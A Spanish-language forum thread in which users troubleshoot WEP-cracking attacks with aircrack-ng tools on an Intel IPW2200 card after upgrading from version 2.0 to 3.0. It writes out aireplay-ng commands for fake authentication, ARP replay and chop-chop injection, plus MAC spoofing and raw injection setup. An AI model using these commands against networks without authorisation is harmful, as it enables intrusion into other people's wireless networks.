Desde la administración :¿Cual me recomendais?

[dj_owen_1]

Cual me recomendais la ¿2.0 o la 3.0?

La 2.0 me iba de lujo, aunque tengo que reconocer que de vez en cuando tenía sus menos, pero con un poco de esfuerzo conseguía salir para delante.

....pero  la ¿¿3.0??  desde que la he instalado, nada de nada, ya se que esto no es una ciencia exacta, y necesita sus horas de dedicación, pero toda la experiencia que había conseguido en la versión anterior aqui no da sus frutos.

Con la 3.0 intento asociarme mediante:

iwconfig-ng eth1 essid "nombre_AP" channel "canal" key 111111

y nada de nada que no se asocia (incluso a aquellas que con la 2.0 se asociaba enseguida)
.... pruebo a bajarle el rate por si acaso es eso:

iwconfig eth1 rate 1M

...........pero nada, mas de lo mismo
pruebo con el ataque chop-chop que en la 2.0 iba de lujo pero a la hora de la inyección con el aireplay: los porcentajes que iban en progreso no comienzan, por tanto me da error a los pocos segundos.

Pruebo con el ataque 3 y tampoco.......   capta ARP y envia paquetes pero el rooter ni se inmuta.

He probado el ataque 1 :

aireplay-ng -1 0 -e "nombre" -a 00:03:C9:XX:XX:XX -h 00:12:XX:XX:XX:XX eth1

y me dice esto

IPW2200-sysfs does not support non-data injection, so attack 1 is not supported

Todo esto ha sido probado en rooters donde el resultado era antes satisfactorio

¿Hay comandos nuevos para la 3.0? ó ¿es mejor seguir de momento con la 2.0?

[the_often]

Posiblemente tengas que levantar la IPW2200 para que te funcione bien, aunque supongo que ya lo habras hecho:

rmmod ipw2200
modprobe ipw2200 rtap_iface=1


Pero si aun asi no te funciona, pues quedate con la 2.0 logicamente. Si es la que mejor te funciona pues esta claro lo que debes hacer.


No falta mucho para que salga la 3.1, asi que de meomento pues usa la que mejor te funcione, esto es, en tu caso la 2.0.


El atake 1 NO se hace asi:

He probado el ataque 1 :

Citar
aireplay-ng -1 0 -e "nombre" -a 00:03:C9:XX:XX:XX -h 00:12:XX:XX:XX:XX eth1
y me dice esto

Citar
IPW2200-sysfs does not support non-data injection, so attack 1 is not supported

Se hace asi:

iwconfig  eth1  essid "nombre_AP"  channel "canal"   key 111111



saludos

[dj_owen_1]

Si, yo solia hacerlo de la forma que tu me has dicho:

iwconfig  eth1  essid "nombre_AP"  channel "canal"   key 111111

pero encontré esto en la web:

Ataque 1: Autentificación falsa

Este ataque es solamente  exitoso cuando necesitamos un cliente asociado al AP para realizar los ataques 2, 3, 4 (-h opción)  y no lo tenemos. Por lo tanto consiste en crear nosotros mismos un cliente que se asociara a ese AP .Hay que recordar llegando a este punto que siempre será mejor un cliente verdadero ya que el falso no genera trafico ARP.

Se recomienda que antes de realizar este ataque cambiemos nuestra dirección MAC de la tarjeta para que envié correctamente ACKs (peticiones).
 
ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up


Una vez realizado esto lanzamos el ataque de la siguiente forma:
aireplay-ng -1 0 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
12:14:06  Sending Authentication Request
12:14:06  Authentication successful
12:14:06  Sending Association Request
12:14:07  Association successful :-)


'the ssid' sin las comillas es el nombre del AP 00:11:22:33:44:55 Cliente falso


Con los CVS 2005-08-14 madwifi parcheados, es posible inyectar paquetes estando en modo Infraestructura (la clave WEP en sí misma no importa, en tanto que el AP acepte autenticación abierta). Por lo que, en lugar de usar el ataque 1, puedes sólo asociarte e inyectar / monitorizar a través de la interfaz athXraw:
ifconfig ath0 down hw ether 00:11:22:33:44:55
iwconfig ath0 mode Managed essid 'the ssid' key AAAAAAAAAA
ifconfig ath0 up
 
 
sysctl -w dev.ath0.rawdev=1
ifconfig ath0raw up
airodump-ng ath0raw out 6

Entonces puedes ejecutar el ataque 3 o el 4 (abajo, aireplay reemplazará automáticamente ath0 por ath0raw):
aireplay-ng -3 -h 00:11:22:33:44:55 -b 00:13:10:30:24:9C ath0
 
aireplay-ng -4 -h 00:10:20:30:40:50 -f 1 ath0
 
Este ataque mencionado anteriormente hay muchas veces que falla y no es 100% seguro ya que ha sido probado por muchos de nosotros. El AP es cierto que escupe ivs pero hay veces que al intentar sacar la clave descubrimos que la clave es la introducida por nosotros por lo tanto no serviría de nada

Algunos puntos de acceso requieren de reautentificación cada 30 segundos, si no nuestro cliente falso será considerado desconectado. En este caso utiliza el retardo de re-asociación periódica:
aireplay-ng -1 30 -e 'the ssid' -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0

si en vez de 30 segundos queremos 20 pues escribimos 20 si fuesen 10 modificamos por 10 y asi sucesivamente

Si este ataque parece fallar (aireplay permanece enviando paquetes de petición de autenticación), puede que esté siendo usado un filtrado de direcciones MAC. Asegúrate también de que:

Estás lo suficientemente cerca del punto de acceso, pero ojo no demasiado porque también puede fallar.
El controlador está correctamente parcheado e instalado.
La tarjeta está configurada en el mismo canal que el AP.
El BSSID y el ESSID (opciones -a / -e) son correctos.
Si se trata de Prism2, asegúrate de que el firmware está actualizado.

[the_often]

Te lo puedo decir mas alto pero no mas claro. Luego tu puedes hacer lo que quieras.

El procedimiento que tu has puesto es para las tarjetas que NO son la IPW2200.

En la primera pagina de la chincheta de la IPW2200 de este mismo subforo, tienes puesto como se hace un A1 con esta tarjeta.

No se hace con aireplay si no directamente con iwconfig.

Esta tarjeta es un poco especial.

Saludos